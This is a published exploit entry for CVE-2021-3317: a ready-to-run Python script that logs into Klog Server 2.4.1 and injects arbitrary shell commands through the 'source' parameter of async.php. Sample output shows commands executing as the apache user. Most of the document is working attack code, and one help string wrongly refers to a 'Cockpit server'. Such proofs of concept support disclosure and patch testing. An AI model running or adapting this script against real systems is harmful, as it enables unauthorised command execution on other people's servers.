Klog Server 2.4.1 - Command Injection (Authenticated)

1. # Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated)
2. # Date: 26.01.2021
3. # Exploit Author: Metin Yunus Kandemir
4. # Vendor Homepage: https://www.klogserver.com/
5. # Version: 2.4.1
6. # Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection
7. # CVE: 2021-3317
8.  
9.  
10. """
11. Description:
12. This script exploits a authenticated command injection vulnerability in the Klog Server <=2.4.1 .
13. async.php file includes that "source" parameter is executed via shell_exec() function without input validation.
14.  
15. Example:
16. python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id
17. [*] Status Code for login request: 302
18. [+] Authentication was successful!
19. [*] Exploiting...
20.  
21. uid=48(apache) gid=48(apache) groups=48(apache)
22.  
23. """
24.  
25. import argparse
26. import requests
27. import sys
28. import urllib3
29. from argparse import ArgumentParser, Namespace
30.  
31.  
32. def main():
33.     dsc = "Klog Server 2.4.1 - Command Injection (Authenticated)"
34.     parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
35.     parser.add_argument("--target", help="IPv4 address of Cockpit server", type=str, required=True)
36.     parser.add_argument("--username", help="Username", type=str, required=True)
37.     parser.add_argument("--password", help="Password", type=str, required=True)
38.     parser.add_argument("--command", help="Command", type=str, required=True)
39.     args: Namespace = parser.parse_args()
40.     if args.target:
41.         target = args.target
42.         if args.username:
43.             username = args.username
44.             if args.password:
45.                 password = args.password
46.                 if args.command:
47.                     command = args.command
48.  
49.                 exploit(target, username, password, command)
50.  
51.  
52. def exploit(target, username, password, command):
53.     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
54.     s = requests.Session()
55.     headers = {
56.         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
57.          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
58.          "Accept-Language": "en-US,en;q=0.5",
59.          "Accept-Encoding": "gzip, deflate",
60.          "Content-Type": "application/x-www-form-urlencoded",
61.          "Connection": "close",
62.          "Upgrade-Insecure-Requests": "1",
63.          }
64.    
65.     data = {"user" : username, "pswd" : password}
66.  
67.     login = s.post("https://" + target + "/actions/authenticate.php" , data=data, headers=headers, allow_redirects=False, verify=False)
68.     print("[*] Status Code for login request: " + str(login.status_code))
69.  
70.     if login.status_code == 302:
71.         check = s.get("https://" + target + "/index.php", allow_redirects=False, verify=False)
72.         if check.status_code == 200:
73.             print("[+] Authentication was successful!")
74.         else:
75.             print("[-] Authentication was unsuccessful!")
76.             sys.exit(1)
77.     else:
78.         print("Something went wrong!")
79.         sys.exit(1)
80.        
81.     print("[*] Exploiting...\n")
82.  
83.     executeCommand = s.get("https://" + target + "/actions/async.php?action=stream&source=;"+ command +";", allow_redirects=False, verify=False)
84.     print(executeCommand.text)
85.     sys.exit(0)
86.  
87. if __name__ == '__main__':
88.     main()